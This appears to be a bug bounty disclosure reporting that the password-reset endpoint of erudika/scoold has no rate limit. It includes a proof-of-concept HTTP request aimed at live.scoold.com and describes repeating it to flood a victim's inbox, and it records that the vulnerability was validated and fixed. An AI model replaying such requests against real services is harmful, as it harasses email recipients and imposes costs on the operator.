Insufficient Granularity of Access Control in erudika/scoold

Valid

Reported on

Aug 1st 2021


✍️ Description

Bypass rate limit and sent unlimited email to any email address.

💥 Impact

Attacker can sent unlimited email to any mail address . Many email service provider has limited email sending like 10000 email per month . If you exeed that limit then you will be extra charged . So, using this attack attacker can exeed that limit and company will be charged extra money.

🕵️‍♂️ Proof of Concept

During password-reset email sending there is not rate limit , which allow attacker to sent unlimited email to any mail address . Bellow request is vulnerable to this

POST /signin/iforgot HTTP/1.1
Host: live.scoold.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://live.scoold.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Origin: https://live.scoold.com
DNT: 1
Connection: close
Cookie: drift_campaign_refresh=6120fffa-1159-4d14-9bb5-eff77e486c0a; drift_aid=fa0512b1-8634-43c6-8abc-7febc322ef3f; driftt_aid=fa0512b1-8634-43c6-8abc-7febc322ef3f
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
 
token=&email=momosaf219%40aline9.com

Here in this postdata change email parameter value to vicitm email.
Now sent this request unlimited time and victim email address will received unlimited verification email . Also attacker can make this as python code and send unlimited email

You should set rate limit there to prevent this

We have contacted a member of the erudika/scoold team and are waiting to hear back 4 months ago
ranjit-git modified their report
4 months ago
Alex Bogdanovski validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Alex Bogdanovski confirmed that a fix has been merged on 6e6604 4 months ago
Alex Bogdanovski has been awarded the fix bounty